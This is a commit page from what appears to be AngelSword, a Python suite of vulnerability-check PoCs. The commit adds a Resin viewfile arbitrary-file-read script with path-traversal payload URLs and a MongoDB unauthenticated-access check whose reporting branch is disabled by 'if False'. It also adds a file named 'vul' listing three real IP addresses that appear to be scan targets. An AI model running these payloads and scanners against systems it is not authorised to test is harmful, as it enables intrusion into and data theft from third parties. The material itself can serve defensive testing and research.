Lucifer1993/AngelSword
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

增加resin任意文件读取poc

Browse Source
This commit is contained in:
Lucifer1993
2017-06-30 17:27:39 +08:00
parent 5639bc9719
commit 5abd956fed
9 changed files with 100 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
.history
View File

@@ -1,5 +1 @@
1|iis_ms15034_httpsys_rce 1|yonyou_test_sqli
2|iis_webdav_rce
3|intel_amt_crypt_bypass
4|smtp_starttls_plaintext_inj
5|juniper_netscreen_backdoor

13
AngelSword.py
View File

@@ -2,6 +2,7 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
import os import os
import re import re
import io
import sys import sys
import time import time
import requests import requests
@@ -17,7 +18,7 @@ from hardware.hardwaremain import *
from multiprocessing import Pool from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool from multiprocessing.dummy import Pool as ThreadPool
warnings.filterwarnings("ignore") warnings.filterwarnings("ignore")
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
SEARCH_HISTORY = dict() SEARCH_HISTORY = dict()
#版本号 #版本号
@@ -225,10 +226,10 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
print("|---------------------------------------------------------------------|") print("|---------------------------------------------------------------------|")
print("\r") print("\r")
elif sys.argv[1] == "-s" and sys.argv[2]: elif sys.argv[1] == "-s" and sys.argv[2]:
keywords = sys.argv[2] keywords = sys.argv[2].strip()
count = 0 count = 0
cprint("搜索结果: ", "green") cprint("搜索结果: ", "green")
with open("pocdb.py") as f: with open("pocdb.py", "r", encoding='utf-8') as f:
for line in f.readlines(): for line in f.readlines():
line = line.strip() line = line.strip()
if line.find(keywords) is not -1: if line.find(keywords) is not -1:
@@ -259,11 +260,11 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
tmpdict = poc_class.hardwarepocdict.copy() tmpdict = poc_class.hardwarepocdict.copy()
alldict.update(tmpdict) alldict.update(tmpdict)
for keyword in alldict.values(): for keyword in alldict.values():
if keyword.__str__().find(sys.argv[2]) is not -1: if keyword.__str__().find(sys.argv[2].strip()) is not -1:
break break
cprint("[+] 加载poc: ["+keyword.__module__+"]", "green") cprint("[+] 加载poc: ["+keyword.__module__+"]", "green")
statistic_count = 0 statistic_count = 0
filepath = sys.argv[4] filepath = sys.argv[4].strip()
allcount = len(open(filepath,'rU').readlines()) allcount = len(open(filepath,'rU').readlines())
with open(filepath) as f: with open(filepath) as f:
for line in f.readlines(): for line in f.readlines():
@@ -295,7 +296,7 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
tmpdict = poc_class.hardwarepocdict.copy() tmpdict = poc_class.hardwarepocdict.copy()
alldict.update(tmpdict) alldict.update(tmpdict)
for keyword in alldict.values(): for keyword in alldict.values():
if keyword.__str__().find(sys.argv[2]) is not -1: if keyword.__str__().find(sys.argv[2].strip()) is not -1:
break break
cprint(FLAGLET, "cyan") cprint(FLAGLET, "cyan")
cprint("[+] 加载poc: ["+keyword.__module__+"]", "cyan") cprint("[+] 加载poc: ["+keyword.__module__+"]", "cyan")

1
pocdb.py
View File

@@ -292,6 +292,7 @@ class pocdb_pocs:
"深澜软件srun3000计费系统user_info.php命令执行":srun_user_info_uid_rce_BaseVerify(url), "深澜软件srun3000计费系统user_info.php命令执行":srun_user_info_uid_rce_BaseVerify(url),
"intel AMT web系统绕过登录(CVE-2017-5689)":intel_amt_crypt_bypass_BaseVerify(url), "intel AMT web系统绕过登录(CVE-2017-5689)":intel_amt_crypt_bypass_BaseVerify(url),
"smtp starttls明文命令注入(CVE-2011-0411)":smtp_starttls_plaintext_inj_BaseVerify(url), "smtp starttls明文命令注入(CVE-2011-0411)":smtp_starttls_plaintext_inj_BaseVerify(url),
"resin viewfile 任意文件读取":resin_viewfile_fileread_BaseVerify(url),
} }
self.hardwarepocdict = { self.hardwarepocdict = {
"Dlink 本地文件包含":router_dlink_webproc_fileread_BaseVerify(url), "Dlink 本地文件包含":router_dlink_webproc_fileread_BaseVerify(url),

0
system/mongodb/__init__.py Normal file
View File

43
system/mongodb/mongodb_unauth.py Normal file
View File

@@ -0,0 +1,43 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: mongodb 未授权漏洞
referer: unknown
author: Lucifer
description: 开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作而且可以远程访问数据库!
'''
import sys
import pymongo
import warnings
from termcolor import cprint
from urllib.parse import urlparse
class mongodb_unauth_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
if r"http" in self.url:
#提取host
host = urlparse(self.url)[1]
flag = host.find(":")
if flag != -1:
host = host[:flag]
else:
host = self.url
try:
port = 27017
mongo = pymongo.MongoClient(host, port)
print(mongo.server_info())
if False:
cprint("[+]存在mongodb 未授权漏洞...(高危)\tpayload: "+host+":"+port, "red")
except Exception as e:
print(e)
cprint("[-] "+__file__+"====>连接超时", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = mongodb_unauth_BaseVerify(sys.argv[1])
testVuln.run()

0
system/resin/__init__.py Normal file
View File

41
system/resin/resin_viewfile_fileread.py Normal file
View File

@@ -0,0 +1,41 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: resin viewfile 任意文件读取
referer: http://www.securityfocus.com/archive/1/434145
author: Lucifer
description: When resin-doc is installed on a system it is possible to read all files
contained within the web root including class files which can then be
decompiled to view the Java source。
'''
import sys
import requests
import warnings
from termcolor import cprint
class resin_viewfile_fileread_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payloads = ["/resin-doc/viewfile/?file=index.jsp",
"/resin-doc/viewfile/?contextpath=/.\../&servletpath=&file=index.jsp",
"/resin-doc/viewfile/?contextpath=/.&servletpath=&file=index.jsp"]
try:
for payload in payloads:
vulnurl = self.url + payload
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"resin-doc" in req.text and r"caucho.server" in req.text:
cprint("[+]存在resin viewfile 任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
except:
cprint("[-] "+__file__+"====>连接超时", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = resin_viewfile_fileread_BaseVerify(sys.argv[1])
testVuln.run()

5
system/systemmain.py
View File

@@ -67,4 +67,7 @@ from system.srun.srun_user_info_uid_rce import srun_user_info_uid_rce_BaseVerify
from system.intel.intel_amt_crypt_bypass import intel_amt_crypt_bypass_BaseVerify from system.intel.intel_amt_crypt_bypass import intel_amt_crypt_bypass_BaseVerify
#smtp vulns #smtp vulns
from system.smtp.smtp_starttls_plaintext_inj import smtp_starttls_plaintext_inj_BaseVerify from system.smtp.smtp_starttls_plaintext_inj import smtp_starttls_plaintext_inj_BaseVerify
#resin vulns
from system.resin.resin_viewfile_fileread import resin_viewfile_fileread_BaseVerify

3
vul Normal file
View File

@@ -0,0 +1,3 @@
http://139.199.154.121
http://113.196.181.206
http://122.141.224.190